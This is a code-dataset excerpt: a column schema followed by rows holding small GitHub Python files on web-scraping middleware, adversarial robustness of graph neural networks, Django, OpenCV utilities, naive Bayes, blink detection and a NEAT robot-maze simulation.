| column | dtype | lengths / classes |
|---|---|---|
| blob_id | string | lengths 40–40 |
| directory_id | string | lengths 40–40 |
| path | string | lengths 2–616 |
| content_id | string | lengths 40–40 |
| detected_licenses | list | lengths 0–69 |
| license_type | string | 2 classes |
| repo_name | string | lengths 5–118 |
| snapshot_id | string | lengths 40–40 |
| revision_id | string | lengths 40–40 |
| branch_name | string | lengths 4–63 |
| visit_date | timestamp[us] | |
| revision_date | timestamp[us] | |
| committer_date | timestamp[us] | |
| github_id | int64 | 2.91k–686M, nullable |
| star_events_count | int64 | 0–209k |
| fork_events_count | int64 | 0–110k |
| gha_license_id | string | 23 classes |
| gha_event_created_at | timestamp[us] | |
| gha_created_at | timestamp[us] | |
| gha_language | string | 213 classes |
| src_encoding | string | 30 classes |
| language | string | 1 class |
| is_vendor | bool | 2 classes |
| is_generated | bool | 2 classes |
| length_bytes | int64 | 2–10.3M |
| extension | string | 246 classes |
| content | string | lengths 2–10.3M |
| authors | list | lengths 1–1 |
| author_id | string | lengths 0–212 |
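For orientation, a minimal sketch of how a single row with the schema above could be filtered in plain Python; the example row values and the size cap are illustrative assumptions, not taken from the dataset.

```python
# Minimal sketch: filter a row of the schema above with plain Python.
# The example row and the max_bytes cap are illustrative assumptions.

def keep_row(row: dict, max_bytes: int = 100_000) -> bool:
    """Keep permissively licensed, human-written Python files under a size cap."""
    return (
        row["license_type"] == "permissive"
        and row["language"] == "Python"
        and not row["is_vendor"]
        and not row["is_generated"]
        and row["length_bytes"] <= max_bytes
    )

example_row = {  # hypothetical values following the column types above
    "license_type": "permissive",
    "language": "Python",
    "is_vendor": False,
    "is_generated": False,
    "length_bytes": 2_484,
}
print(keep_row(example_row))  # True
```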
| blob_id: 14fe14d5b0927cec2aafdb55e5df8d1d80138460 | directory_id: 3ee7db94e09183f9fa7cc854fdb03b661c1d0b8c | content_id: e601d02f4109a4399723d51ec5f5f3c4be5c18fb |
| path: /landchina/middlewares/middleware.py | repo_name: Eddy-zdz/landchina | branch_name: refs/heads/master |
| snapshot_id: 44425eac71cfad5d6d456d8a472117f086e5b30c | revision_id: 85f26b8f4d8610dcce93abf6f1fd0da326e1ff17 |
| detected_licenses: [] | license_type: no_license | visit_date: 2023-03-16T18:38:01.897874 | revision_date: 2017-05-27T07:26:07 | committer_date: 2017-05-27T07:26:07 |
| github_id: null | star_events_count: 0 | fork_events_count: 0 | gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null |
| src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 279 | extension: py |
content:
# encoding:utf-8
from random import *
from landchina.middlewares.user_agents import agents
class UserAgentMiddleware(object):
'''Rotate the User-Agent'''
def process_request(self, request, spider):
agent = choice(agents)
request.headers["User-Agent"] = agent
| authors: ["yuhangzhan@YuhangdeMacBook-Pro.local"] | author_id: yuhangzhan@YuhangdeMacBook-Pro.local |
| blob_id: 4123cc56630e37945d21654123abf8df84261538 | directory_id: bae78540696a58c5f43e3234b6dc16ccdb4adb03 | content_id: 26c47fe2940a8621125bdec0c8d2649627f9e8e6 |
| path: /node_attack/attackSet.py | repo_name: Gadishenhar/adversarial_gnn | branch_name: refs/heads/master |
| snapshot_id: 8996c08f4432ee19f13d3e0f28706a32a13a43ad | revision_id: 79a0ef983028fa1007ecf8c1c009aa7e43cab83b |
| detected_licenses: [] | license_type: no_license | visit_date: 2023-07-18T04:18:25.019267 | revision_date: 2021-09-07T17:20:15 | committer_date: 2021-09-07T17:20:15 |
| github_id: 357,277,797 | star_events_count: 0 | fork_events_count: 0 | gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null |
| src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 7,654 | extension: py |
content:
from node_attack.attackVictim import attackVictim
from node_attack.attackTrainer import test
from classes.basic_classes import Print
import copy
import numpy as np
import torch
# a wrapper that chooses a victim node and attacks it using attackVictim
# an attack can have 3 modes described in parameter attack_params
# regular - for regular attacks
# adversarial - for adversarial training
# distance - for attack as a function of distance from the victim node
# important note: these modes only affect the printed output of the functions, not their functionality
def attackSet(attack, approach, print_answer, trainset):
device = attack.device
dataset = attack.dataset
data = dataset.data
if print_answer is not Print.NO:
printAttackHeader(attack=attack, approach=approach)
num_attacks, nodes_to_attack = getNodesToAttack(data=data, trainset=trainset)
attacked_nodes = np.random.choice(nodes_to_attack, num_attacks, replace=False)
attacked_nodes = torch.from_numpy(attacked_nodes).to(device)
y_targets = getClassificationTargets(attack=attack, num_attacks=num_attacks, attacked_nodes=attacked_nodes)
# chooses a victim node and attacks it using oneNodeAttack
attack_results_for_all_attacked_nodes = []
attack.model_wrapper.model.attack = True
model0 = copy.deepcopy(attack.model_wrapper.model)
for node_num in range(num_attacks):
attacked_node = torch.tensor([attacked_nodes[node_num]], dtype=torch.long).to(device)
y_target = torch.tensor([y_targets[node_num]], dtype=torch.long).to(device)
# check if the model is changed in between one node attacks
if not attack.mode.isAdversarial():
attack.setModel(model0)
classified_to_target = checkNodeClassification(attack=attack, attacked_node=attacked_node, y_target=y_target,
print_answer=print_answer, attack_num=node_num + 1)
# important note: the victim is attacked only if it is classified to y_target!
if classified_to_target:
attack_results = attackVictim(attack=attack, approach=approach, print_answer=print_answer,
attacked_node=attacked_node, y_target=y_target, node_num=node_num + 1)
# in case of an impossible attack (i.e. double attack with bfs of 1)
if attack_results is None:
attack_results = torch.tensor([[0, 0]])
# in case of a misclassification
else:
attack_results = torch.tensor([[1, 0]])
attack_results_for_all_attacked_nodes.append(attack_results)
# print results and save accuracies
attack_results_for_all_attacked_nodes = torch.cat(attack_results_for_all_attacked_nodes)
mean_defence_results = getDefenceResultsMean(attack_results=attack_results_for_all_attacked_nodes,
num_attributes=data.x.shape[1])
attack.model_wrapper.model.attack = False
if print_answer is Print.YES:
print("######################## Attack Results ######################## ", flush=True)
printAttackHeader(attack=attack, approach=approach)
if not trainset:
printAttack(dataset=dataset, basic_log=attack.model_wrapper.basic_log,
mean_defence_results=mean_defence_results, num_attributes=data.x.shape[1])
return mean_defence_results, attacked_nodes, y_targets
# a function which prints the header for the final results
def printAttackHeader(attack, approach):
distance_log = ''
if attack.mode.isDistance():
distance_log += 'Distance: {:02d} '.format(attack.current_distance)
# the general print header
targeted_attack_str = 'Targeted' if attack.targeted else 'Untargeted'
if attack.mode.isDistance():
print("######################## " + distance_log + targeted_attack_str + " " + approach.string() + " " +
attack.model_wrapper.model.name + " Attack ########################", flush=True)
info = "######################## Max Attack Epochs:" + str(attack.attack_epochs)
if attack.l_inf is not None:
info += " Linf:{:.2f}".format(attack.l_inf)
print(info + " lr:" + str(attack.lr) + " ########################", flush=True)
# a helper that checks that we do not exceed the num of nodes available in our train/test sets
def getNodesToAttack(data, trainset):
if trainset:
num_attacks = torch.sum(data.train_mask).item()
nodes_to_attack = np.where(np.array(data.train_mask.tolist()))[0]
else:
num_attacks = torch.sum(data.test_mask).item()
nodes_to_attack = np.where(np.array(data.test_mask.tolist()))[0]
return num_attacks, nodes_to_attack
# a helper that returns the target of the attack task
# if the attack is targeted it will return the target classification
# if the attack is untargeted it will return the correct classification of the node
def getClassificationTargets(attack, num_attacks, attacked_nodes):
dataset = attack.dataset
data = dataset.data
device = attack.device
if attack.targeted:
y_targets = np.random.random_integers(0, dataset.num_classes - 2, size=num_attacks)
y_targets = torch.from_numpy(y_targets).to(device)
for idx, _ in enumerate(y_targets):
if y_targets[idx] == data.y[attacked_nodes[idx]]:
y_targets[idx] = dataset.num_classes - 1
else:
y_targets = data.y[attacked_nodes].to(device)
return y_targets.type(torch.LongTensor).to(device)
# a helper function that checks if the node is currecly classified to y_target
@torch.no_grad()
def checkNodeClassification(attack, attacked_node, y_target, print_answer, attack_num):
results = test(attack.dataset.data, attack.model_wrapper.model, attack.targeted, attacked_node, y_target)
classified_to_target = not results[3]
if not classified_to_target and print_answer is Print.YES:
attack_log = 'Attack: {:03d}, Node: {}, Misclassified already!\n' \
.format(attack_num, attacked_node.item())
if attack.mode.isAdversarial():
attack_log = 'Adv Epoch: {:03d}, '.format(attack.idx) + attack_log
print(attack_log, flush=True)
return classified_to_target
def getDefenceResultsMean(attack_results, num_attributes):
attack_results = attack_results.type(torch.FloatTensor)
mean_defence_results = attack_results.mean(dim=0)
mask1 = (attack_results[:, 1] != 0)
mask2 = (attack_results[:, 1] != num_attributes)
mask = torch.logical_and(mask1, mask2)
if torch.sum(mask) > 0:
mean_defence_results[1] = torch.mean(attack_results[mask, 1], dim=0)
else:
mean_defence_results[1] = num_attributes
mean_defence_results[0] = 1 - mean_defence_results[0]
return mean_defence_results
# a function which prints final results
def printAttack(dataset, basic_log, mean_defence_results, num_attributes):
attack_log = ''
if basic_log is not None:
attack_log += basic_log + ', '
attack_log += 'Test Defence Success: {:.4f}\n'
attack_log = attack_log.format(mean_defence_results[0].item())
if not dataset.skip_attributes:
if mean_defence_results[1] != num_attributes:
num_of_attack_attributes = mean_defence_results[1].item()
mus = tuple([num_of_attack_attributes] + [num_of_attack_attributes / num_attributes])
attack_log += '#Success attack attributes: {:.1f}, #Success attack attributes%: {:.3f}\n'.format(*mus)
else:
attack_log += 'All attacks fail, no #attributes'
print(attack_log, flush=True)
| authors: ["gadi.shenhar@gmail.com"] | author_id: gadi.shenhar@gmail.com |
| blob_id: cfbbe9fd87346ac41ce6d9352492c08480e4ec86 | directory_id: 3cdbe5f5810a035ae168f8ff01c39f58c571e428 | content_id: 3a2a55b2b3c56503895e31b0b55d1c431628e5d5 |
| path: /golf/migrations/0047_auto_20171013_0759.py | repo_name: kenrumer/scorekeeper | branch_name: refs/heads/master |
| snapshot_id: ebd6467e2ecde3da96bb08ef77a56f967cbde00e | revision_id: c7f22676e84dfdf6ca3361c6ff56719f68fce31f |
| detected_licenses: ["MIT"] | license_type: permissive | visit_date: 2021-01-22T05:01:11.370869 | revision_date: 2018-01-12T07:13:20 | committer_date: 2018-01-12T07:13:20 |
| github_id: 102,276,714 | star_events_count: 0 | fork_events_count: 0 | gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null |
| src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 710 | extension: py |
content:
# -*- coding: utf-8 -*-
# Generated by Django 1.11.5 on 2017-10-13 07:59
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('golf', '0046_auto_20171013_0021'),
]
operations = [
migrations.RemoveField(
model_name='round',
name='tournament',
),
migrations.AddField(
model_name='round',
name='tournament_date',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='golf.TournamentDate', verbose_name='Tournament and Date'),
),
]
| authors: ["kenrumer@gmail.com"] | author_id: kenrumer@gmail.com |
| blob_id: 98baca09d978b22e4aafe983659206cae94d96c0 | directory_id: 5c790dc4cde3914edb7af4ac67030b0e85f4a8a2 | content_id: 82c4715a192d3c361c849896b035cd91ee56dc42 |
| path: /utils/evaluation_utils.py | repo_name: wx-b/SGMNet | branch_name: refs/heads/main |
| snapshot_id: 49e39907793a48ff0a3cc512aba70fa743a8ebb2 | revision_id: 52a1ebebb33b4ba952f95d239d25e600b5b8d989 |
| detected_licenses: ["MIT"] | license_type: permissive | visit_date: 2023-09-04T06:41:52.603991 | revision_date: 2021-10-30T04:54:18 | committer_date: 2021-10-30T04:54:18 |
| github_id: null | star_events_count: 0 | fork_events_count: 0 | gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null |
| src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 2,484 | extension: py |
content:
import numpy as np
import h5py
import cv2
def normalize_intrinsic(x,K):
#print(x,K)
return (x-K[:2,2])/np.diag(K)[:2]
def normalize_size(x,size,scale=1):
size=size.reshape([1,2])
norm_fac=size.max()
return (x-size/2+0.5)/(norm_fac*scale)
def np_skew_symmetric(v):
zero = np.zeros_like(v[:, 0])
M = np.stack([
zero, -v[:, 2], v[:, 1],
v[:, 2], zero, -v[:, 0],
-v[:, 1], v[:, 0], zero,
], axis=1)
return M
def draw_points(img,points,color=(0,255,0),radius=3):
dp = [(int(points[i, 0]), int(points[i, 1])) for i in range(points.shape[0])]
for i in range(points.shape[0]):
cv2.circle(img, dp[i],radius=radius,color=color)
return img
def draw_match(img1, img2, corr1, corr2,inlier=[True],color=None,radius1=1,radius2=1,resize=None):
if resize is not None:
scale1,scale2=[img1.shape[1]/resize[0],img1.shape[0]/resize[1]],[img2.shape[1]/resize[0],img2.shape[0]/resize[1]]
img1,img2=cv2.resize(img1, resize, interpolation=cv2.INTER_AREA),cv2.resize(img2, resize, interpolation=cv2.INTER_AREA)
corr1,corr2=corr1/np.asarray(scale1)[np.newaxis],corr2/np.asarray(scale2)[np.newaxis]
corr1_key = [cv2.KeyPoint(corr1[i, 0], corr1[i, 1], radius1) for i in range(corr1.shape[0])]
corr2_key = [cv2.KeyPoint(corr2[i, 0], corr2[i, 1], radius2) for i in range(corr2.shape[0])]
assert len(corr1) == len(corr2)
draw_matches = [cv2.DMatch(i, i, 0) for i in range(len(corr1))]
if color is None:
color = [(0, 255, 0) if cur_inlier else (0,0,255) for cur_inlier in inlier]
if len(color)==1:
display = cv2.drawMatches(img1, corr1_key, img2, corr2_key, draw_matches, None,
matchColor=color[0],
singlePointColor=color[0],
flags=4
)
else:
height,width=max(img1.shape[0],img2.shape[0]),img1.shape[1]+img2.shape[1]
display=np.zeros([height,width,3],np.uint8)
display[:img1.shape[0],:img1.shape[1]]=img1
display[:img2.shape[0],img1.shape[1]:]=img2
for i in range(len(corr1)):
left_x,left_y,right_x,right_y=int(corr1[i][0]),int(corr1[i][1]),int(corr2[i][0]+img1.shape[1]),int(corr2[i][1])
cur_color=(int(color[i][0]),int(color[i][1]),int(color[i][2]))
cv2.line(display, (left_x,left_y), (right_x,right_y),cur_color,1,lineType=cv2.LINE_AA)
return display
| authors: ["hchencf@connect.ust.hk"] | author_id: hchencf@connect.ust.hk |
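The np_skew_symmetric helper in /utils/evaluation_utils.py builds the cross-product matrix row by row. A small self-contained check of that identity; the function is restated here under the assumption that the snippet above is not importable as a module.

```python
# Quick check that the 3x3 matrix produced by np_skew_symmetric satisfies
# M @ w == cross(v, w). The function body is copied from the snippet above.
import numpy as np

def np_skew_symmetric(v):
    zero = np.zeros_like(v[:, 0])
    M = np.stack([
        zero, -v[:, 2], v[:, 1],
        v[:, 2], zero, -v[:, 0],
        -v[:, 1], v[:, 0], zero,
    ], axis=1)
    return M

v = np.array([[1.0, 2.0, 3.0]])
w = np.array([4.0, 5.0, 6.0])
M = np_skew_symmetric(v).reshape(3, 3)        # rows come back flat, reshape to 3x3
print(np.allclose(M @ w, np.cross(v[0], w)))  # True
```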
| blob_id: 99a372505fbc2ad18b5b12d2199ed516c7e5cfe5 | directory_id: a43f26f346c4baa3483ecc6e7b28275c0ee2f0c4 | content_id: acdc4f3fb4321bbd3ca988b5c7a4782578083e29 |
| path: /mlshizhan_pdf/naive_bayes/bayes.py | repo_name: Tguoliang/machine_learning | branch_name: refs/heads/master |
| snapshot_id: 25223c7d4327a6a0e6f1c645c6fad63563b665e5 | revision_id: 467b9140c0e5561824ae6b94fc43d47c43f421dd |
| detected_licenses: [] | license_type: no_license | visit_date: 2020-03-23T06:36:02.279056 | revision_date: 2017-09-27T03:36:31 | committer_date: 2017-09-27T03:36:31 |
| github_id: null | star_events_count: 0 | fork_events_count: 0 | gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null |
| src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 3,046 | extension: py |
content:
from numpy import *
def loadDataSet():
postingList = [['my', 'dog', 'has', 'flea', \
'problems', 'help', 'please'],
['maybe', 'not', 'take', 'him', \
'to', 'dog', 'park', 'stupid'],
['my', 'dalmation', 'is', 'so', 'cute', \
'I', 'love', 'him'],
['stop', 'posting', 'stupid', 'worthless', 'garbage'],
['mr', 'licks', 'ate', 'my', 'steak', 'how',\
'to', 'stop', 'him'],
['quit', 'buying', 'worthless', 'dog', 'food', 'stupid']]
classVec = [0,1,0,1,0,1]
return postingList,classVec
def createVocabList(dataSet):
vocabSet = set([])
for document in dataSet:
vocabSet = vocabSet | set(document)
return list(vocabSet)
def setOfWords2Vec(vocabList, inputSet):
returnVec = [0]*len(vocabList)
for word in inputSet:
if word in vocabList:
returnVec[vocabList.index(word)] = 1
else:print("the word: %s is not in my Vocabulary! " % word)
return returnVec
def trainNB0(trainMatrix, trainCategory):
numTrainDocs = len(trainMatrix)
numWords = len(trainMatrix[0])
pAbusive = sum(trainCategory)/float(numTrainDocs)
p0Num = zeros(numWords); p1Num = zeros(numWords)
p0Denom = 0.0; p1Denom = 0.0
for i in range(numTrainDocs):
if trainCategory[i] == 1:
p1Num += trainMatrix[i]
p1Denom += sum(trainMatrix[i])
else:
p0Num += trainMatrix[i]
p0Denom += sum(trainMatrix[i])
p1Vect = p1Num/p1Denom
p0Vect = p0Num/p0Denom
return p0Vect,p1Vect,pAbusive
# count word occurrence frequencies
def calcMostFreq(vocabList,fullText):
import operator
freqDict = {}
for token in vocabList:
freqDict[token] = fullText.count(token)
sortedFreq = sorted(freqDict.iteritems(), key=operator.itemgetter(1),\
reverse=True)
return sortedFreq[:30]
# count word occurrence frequencies
#
def localWords(feed1,feed0):
import feedparser
docList = []; classList = []; fullText = []
minLen = min(len(feed1['entries']),len(feed0['entries']))
for i in range(minLen):
wordList = textParse(feed1['entries'][i]['summary'])
docList.append(wordList)
fullText.extend(wordList)
classList.append(1)
wordList = textParse(feed0['entries'][i]['summary'])
docList.append(wordList)
fullText.extend(wordList)
classList.append(0)
vocabList = createVocabList(docList)
top30Words = calcMostFreq(vocabList, fullText)
for pairW in top30Words:
if pairW[0] in vocabList: vocabList.remove(pairW[0])
trainingSet = range(2*minLen); testSet = []
for i in range(20):
randIndex = int(random.uniform(0,len(trainingSet)))
testSet.append(trainingSet[randIndex])
del(trainingSet[randIndex])
trainMat = []; trainClasses = []
for docIndex in trainingSet:
trainMat.append(bagOfWords2VecMN(vocabList, docList[docIndex]))
trainClasses.append(classList[docIndex])
p0V,p1V,pSpam = trainNB0(array(trainMat),array(trainClasses))
errorCount = 0
for docIndex in testSet:
wordVector = bagOfWords2VecMN(vocabList, docList[docIndex])
if classifyNB(array(wordVector),p0V,p1V,pSpam) != \
classList[docIndex]:
errorCount += 1
print('the error rate is: ',float(errorCount)/len(testSet))
return vocabList,p0V,p1V
#
| authors: ["1178599427@qq.com"] | author_id: 1178599427@qq.com |
| blob_id: 4f75d73abfee6f0661d8d553c4fe61c2e504d5fc | directory_id: 04b41d0703bdc690331583c24a44940bf393d3a1 | content_id: ea23ebf31aa3cc7dc9cf6e569c45f17f42f0487d |
| path: /dinoGameWBlinkDetector.py | repo_name: create-bug/dinoGame_blinkDetection | branch_name: refs/heads/master |
| snapshot_id: 6f17a2eda51cf99b80e2cf851a1a13a53648b54c | revision_id: 5a1d7c2dbf5b632e8590120592e6ff040008b391 |
| detected_licenses: [] | license_type: no_license | visit_date: 2022-10-26T05:59:12.191488 | revision_date: 2020-06-15T11:11:53 | committer_date: 2020-06-15T11:11:53 |
| github_id: null | star_events_count: 0 | fork_events_count: 0 | gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null |
| src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 2,033 | extension: py |
content:
import cv2
import dlib
from scipy.spatial import distance
import pyautogui
import time
def calculate_EAR(eye):
A = distance.euclidean(eye[1], eye[5])
B = distance.euclidean(eye[2], eye[4])
C = distance.euclidean(eye[0], eye[3])
ear_aspect_ratio = (A+B)/(2.0*C)
return ear_aspect_ratio
def jump():
pyautogui.keyDown('space')
time.sleep(0.01)
print("jump")
pyautogui.keyUp('space')
cap = cv2.VideoCapture(0)
hog_face_detector = dlib.get_frontal_face_detector()
dlib_facelandmark = dlib.shape_predictor("shape_predictor_68_face_landmarks.dat")
while True:
_, frame = cap.read()
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
faces = hog_face_detector(gray)
for face in faces:
face_landmarks = dlib_facelandmark(gray, face)
leftEye = []
rightEye = []
for n in range(36,42):
x = face_landmarks.part(n).x
y = face_landmarks.part(n).y
leftEye.append((x,y))
next_point = n+1
if n == 41:
next_point = 36
x2 = face_landmarks.part(next_point).x
y2 = face_landmarks.part(next_point).y
cv2.line(frame,(x,y),(x2,y2),(0,255,0),1)
for n in range(42,48):
x = face_landmarks.part(n).x
y = face_landmarks.part(n).y
rightEye.append((x,y))
next_point = n+1
if n == 47:
next_point = 42
x2 = face_landmarks.part(next_point).x
y2 = face_landmarks.part(next_point).y
cv2.line(frame,(x,y),(x2,y2),(0,255,0),1)
left_ear = calculate_EAR(leftEye)
right_ear = calculate_EAR(rightEye)
EAR = (left_ear+right_ear)/2
EAR = round(EAR,2)
# print(EAR)
if EAR<0.26:
jump()
# cv2.putText(frame,"JUMP",(20,100), cv2.FONT_HERSHEY_SIMPLEX,3,(0,0,255),4)
# cv2.imwrite("image.jpg",frame)
cv2.imshow("Dino Game with Blink Detection", frame)
key = cv2.waitKey(1)
if key == 27:
break
cap.release()
cv2.destroyAllWindows()
| authors: ["misbah4064@gmail.com"] | author_id: misbah4064@gmail.com |
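The blink detector above compares the eye aspect ratio (A+B)/(2C) against a 0.26 threshold. A toy sketch with assumed landmark coordinates (not real dlib output) showing how open and closed eyes fall on either side of that threshold; calculate_EAR is restated so the sketch runs on its own.

```python
# Toy numbers only: assumed eye-contour points, not dlib landmark output.
from scipy.spatial import distance

def calculate_EAR(eye):
    A = distance.euclidean(eye[1], eye[5])   # first vertical gap
    B = distance.euclidean(eye[2], eye[4])   # second vertical gap
    C = distance.euclidean(eye[0], eye[3])   # horizontal eye width
    return (A + B) / (2.0 * C)

open_eye   = [(0, 0), (3, 3), (7, 3), (10, 0), (7, -3), (3, -3)]   # tall contour
closed_eye = [(0, 0), (3, 1), (7, 1), (10, 0), (7, -1), (3, -1)]   # flattened contour

print(round(calculate_EAR(open_eye), 2))    # 0.6 -> above 0.26, no blink
print(round(calculate_EAR(closed_eye), 2))  # 0.2 -> below 0.26, would trigger jump()
```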
| blob_id: d0a080cd1772868b8f31fb2b141db45964827968 | directory_id: ada1320d2bace0f82e12249358861f893c788ae1 | content_id: 866c6edc960f6f1ebdbfb6fa11592e7c4976f268 |
| path: /RobotMaze.py | repo_name: fiberpaper/NEAT-world | branch_name: refs/heads/master |
| snapshot_id: 9d5ef11c73a3f88e01747e92be239d98935f66a6 | revision_id: 2821b6ce2564f78d93eb93f371b5d72692afb3e5 |
| detected_licenses: [] | license_type: no_license | visit_date: 2020-03-14T02:30:23.854621 | revision_date: 2018-04-28T11:03:18 | committer_date: 2018-04-28T11:03:18 |
| github_id: 131,400,210 | star_events_count: 0 | fork_events_count: 0 | gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null |
| src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 9,622 | extension: py |
content:
## v0 - 11/06/2017
## RobotMaze world
from Maze import maze
from Robot import robot
from RobotPhenotype import robot_phenotype
from Innovation import innovation
from Activations import activations
from Specie import specie
import Reproduction
import matplotlib.pyplot as plt
import numpy as np
import time
import pickle
import sys
## Define RobotMaze class
class robot_maze:
# Create world
def __init__(self,param):
# Global parameters
self.population_size=param['population_size']
self.maze_count=param['world_count']
self.max_species=param['max_species']
self.wall_nb=param['world_wall_nb']
self.pos_type=param['world_pos_type']
self.maze_type=param['world_type']
self.maze_size=param['world_size']
self.viability=param['viability']
self.activation_name=param['activation_func']
self.verbose=param['verbose']
self.debug=param['debug']
self.work_dir=param['work_dir']
self.debug=param['debug']
# Reproduction probabilities parameters
self.reproduction_dic={'keep_prct':param['keep_prct'],
'disable_gene_prob':param['disable_gene_prob'],
'crossover_prob':param['crossover_prob'],
'different_specie_crossover_prob':param['different_specie_crossover_prob'],
'weight_mut_prob':param['weight_mut_prob'],
'weight_mut_is_uniform_prob':param['weight_mut_is_uniform_prob'],
'add_node_prob':param['add_node_prob'],
'add_connection_prob':param['add_connection_prob'],
'change_activation_prob':param['change_activation_prob'],
'max_weight_perturb':param['max_weight_perturb']
}
# Activation functions
self.activation_func=self.activation_name
# Activation list
self.activation_list=activations(self.activation_func)
# Maze
self.mazes=list()
# Robots
self.R_parents=list()
self.R_children=list()
# Robot phenotype
self.Rphenotype_parents=robot_phenotype()
self.Rphenotype_children=robot_phenotype()
# Gene and innovation trackers (as list to be able to update them in sub routines)
self.cur_innovation=[-1]
self.cur_node=[-1]
# Innovation list to avoid duplicated mutations in a generation
self.innovation_list=innovation()
# Species
self.specie=specie(param['specie_delta'],param['c1_excess'],param['c2_disjoint'],param['c3_weight'])
# Populate world
def populate(self,load_maze=False,dir=-1):
print('# Populate world')
# Load Mazes if load_maze==True
if (load_maze) :
for i_maze in range(self.maze_count):
file = open(dir+'maze_'+str(i_maze)+'.p', "rb")
self.mazes.append(pickle.load(file))
file.close()
# Otherwise create mazes
else :
for i_maze in range(self.maze_count):
print('### Maze {}'.format(i_maze))
# Append new maze
if (self.wall_nb==-1):
self.mazes.append(maze(self.maze_size,self.maze_type,i_maze,position=self.pos_type))
else :
self.mazes.append(maze(self.maze_size,self.maze_type,self.wall_nb,position=self.pos_type))
# Save maze
if (dir == -1):
file = open('./maze_'+str(i_maze)+'.p', "wb")
else:
file = open(dir+'maze_'+str(i_maze)+'.p', "wb")
pickle.dump(self.mazes[-1],file)
file.close()
# Robots
for i_robot in range(self.population_size):
self.R_parents.append(robot(self.maze_count,self.mazes,self.cur_node,self.activation_func))
# Robots phenotypes
for i_robot in range(self.population_size):
self.Rphenotype_parents.add_robot(self.R_parents,i_robot,self.maze_count)
# Robots species
for i_robot in range(self.population_size):
self.specie.compatibility(self.R_parents[i_robot].genome)
# Species count
self.specie.count(self.R_parents)
# Reproduce population
def reproduce_pop(self):
# Reproduce parents
self.R_children=Reproduction.reproduce(self.R_parents,self.Rphenotype_parents,self.specie,self.max_species,self.population_size,self.maze_count,self.mazes,self.cur_node,self.cur_innovation,self.innovation_list,self.activation_func,self.reproduction_dic,self.debug)
# Children phenotypes
self.Rphenotype_children=robot_phenotype()
for i_robot in range(self.population_size):
self.Rphenotype_children.add_robot(self.R_children,i_robot,self.maze_count)
# Replace parents
del self.R_parents
del self.Rphenotype_parents
self.R_parents=self.R_children
self.Rphenotype_parents=self.Rphenotype_children
# Reset innovation
def reset_innovation(self):
self.innovation_list=innovation()
# Evaluate population
def eval_pop(self,max_step):
# Evaluate population
for i_robot in range(self.population_size):
# Compute time
t0=time.time()
# Variables initialization
t_move=0.0
t_fit=0.0
step=0
IsMoving=True
ReachedGoal=False
# Run only if not evaluated already
if (not self.R_parents[i_robot].IsEvaluated):
# Time
t0b=time.time()
# while robot moving, not reached goals on all mazes and not reached max step
while ( (step<max_step) and (not ReachedGoal) and (IsMoving)):
# Move robot
IsMoving=self.Rphenotype_parents.move_robot(self.R_parents,self.mazes,i_robot,self.maze_count,self.activation_list,time_step=1.0)
t0a=time.time()
t_move+=t0a-t0b
# Compute fitness every 50 steps
if (np.mod(step,50)==0):
ReachedGoal=self.Rphenotype_parents.compute_fitness(self.R_parents,self.mazes,i_robot,self.maze_count,max_dist=10)
t0b=time.time()
t_fit+=t0b-t0a
# Increment step
step+=1
#print(step,ReachedGoal,IsMoving)
# Compute adjusted fitness
self.Rphenotype_parents.adjust_fitness(self.R_parents,i_robot,self.specie)
# Switch flag for evaluation to True
self.R_parents[i_robot].IsEvaluated=True
# If goal reached stop and return
if (ReachedGoal):
print('Robot {} reached Goal !!!'.format(i_robot))
return True
# Time
t1=time.time()
# Print timing
sys.stdout.write('Robot {0:6d} took {1:4.2f} s to evaluate, move: {2:4.4f}, fit: {3:4.4f}, avg fitness: {4:4.4f} \r'.format(i_robot,t1-t0,t_move,t_fit,self.R_parents[i_robot].fitness_avg) )
sys.stdout.flush()
#print('Robot {0:6d} took {1:4.2f} s to evaluate, move: {2:4.4f}, fit: {3:4.4f}, avg fitness: {4:4.4f}'.format(i_robot,t1-t0,t_move,t_fit,self.R_parents[i_robot].fitness_avg))
return False
# Visualize world
def visualize(self,igen):
print('Visualise world')
# Get 2 mazes max
n_maze = min(self.maze_count,4)
# Get 4 robots
n_robot = 4
# number column display
n_col = n_maze
# number rows display
n_row = n_robot
# Find the best 4
fitness_robot=np.zeros(len(self.R_parents))
for i_robot in range(len(self.R_parents)):
fitness_robot[i_robot]=self.R_parents[i_robot].fitness_avg
i_sorted_robot=sorted(range(len(fitness_robot)), key=lambda k: fitness_robot[k])
i_best_robot=i_sorted_robot[-4:]
print(i_best_robot)
print('# Best robot genome')
self.R_parents[i_best_robot[3]].genome.print_genome()
print('# Fitness best robot: {}'.format(self.R_parents[i_best_robot[3]].fitness_avg))
i_subplot=1
# For each robot
for i_robot in i_best_robot:
# For each maze
for i_maze in range(n_maze):
#Compute vizualisation
viz=self.R_parents[i_robot].visualize_path(i_maze,self.mazes)
plt.subplot(n_row,n_col,i_subplot)
plt.imshow(viz,cmap='gray')
i_subplot+=1
# Save plot with generation number
plt.savefig(self.work_dir+'images\\'+str(igen)+'.png', dpi=400, bbox_inches='tight')
# Number of species
print('Species count: {}'.format(self.specie.specie_count))
print('Species delta: {}'.format(self.specie.delta))
print('Number of species : {}'.format(len(self.specie.specie_count)))
# Evolve maze (TODO)
#def evolve(self):
# Evolve maze
#self.mazes.evolve_maze()
# Update robots accordingly
#for irobot in range(len(self.R_parents)):
# robot.update_maze(self.maze)
| authors: ["noreply@github.com"] | author_id: fiberpaper.noreply@github.com |
